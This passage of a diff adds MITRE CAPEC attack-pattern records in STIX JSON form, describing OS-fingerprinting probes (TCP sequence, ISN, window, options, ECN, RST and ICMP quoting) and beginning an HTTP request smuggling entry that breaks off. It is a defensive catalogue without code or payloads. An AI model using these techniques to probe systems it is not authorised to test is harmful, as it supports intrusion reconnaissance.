", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. 
Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.", + "external_references": [ + { + "external_id": "CAPEC-321", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/321.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--cd7d1252-30ed-4ba1-a334-52f7a8b7c748", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Sequence Number Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + 
"x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. 
The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.", + "external_references": [ + { + "external_id": "CAPEC-322", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/322.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Greatest Common Divisor Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide 
Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.", + "external_references": [ + { + "external_id": "CAPEC-323", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/323.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon 
\"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4ac0eeac-2467-403a-9c64-be3a7b3f3083", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Counter Rate Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). 
Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": 
"Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. 
Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection 
Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the \"connected\" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. 
The initial window size can be sampled by establishing an ordinary TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-326", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4dd22c6-ad54-47c8-b0ab-d7f3cad9e026", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Initial Window Size Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + 
"Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.", + "external_references": [ + { + "external_id": "CAPEC-327", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The 
Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c0ad20d0-8b30-460c-a060-da46582bdbec", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Options Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. 
RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.", + "external_references": [ + { + "external_id": "CAPEC-328", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2d865521-82f5-42e5-a595-dc93f60dfd3f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP 'RST' Flag Checksum Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] 
+ }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. 
Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). 
Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) 
to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-33", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/33.html" + }, + { + "external_id": "CWE-444", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/444.html" + }, + { + "description": "HTTP Request Smuggling", + "external_id": "26", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Smuggling" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Smuggling, 2010--01, The Web Application Security Consortium", + "external_id": "REF-672", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246928/HTTP%20Request%20Smuggling" + }, + { + "description": "Dzevad Alibegovic, HTTP Request Smuggling: Complete Guide to Attack Types and Prevention, 2021--08---23, NeuraLegion", + "external_id": "REF-673", + "source_name": "reference_from_CAPEC", + "url": "https://www.neuralegion.com/blog/http-request-smuggling-hrs/" + }, + { + "description": "Busra Demir, A Pentester’s Guide to HTTP Request Smuggling, 
2020--10---15, Cobalt", + "external_id": "REF-674", + "source_name": "reference_from_CAPEC", + "url": "https://cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling" + }, + { + "description": "Edi Kogan, Daniel Kerman, HTTP Desync Attacks in the Wild and How to Defend Against Them, 2019--10---29, Imperva", + "external_id": "REF-678", + "source_name": "reference_from_CAPEC", + "url": "https://www.imperva.com/blog/http-desync-attacks-and-defence-methods/" + }, + { + "description": "James Kettle, HTTP Desync Attacks: Request Smuggling Reborn, 2019--08---07, PortSwigger", + "external_id": "REF-681", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn" + }, + { + "description": "HTTP request smuggling, PortSwigger", + "external_id": "REF-682", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling" + }, + { + "description": "Finding HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-683", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/finding" + }, + { + "description": "Exploiting HTTP request smuggling vulnerabilities, PortSwigger", + "external_id": "REF-684", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/request-smuggling/exploiting" + } + ], + "id": "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Smuggling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "HTTP Desync" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + 
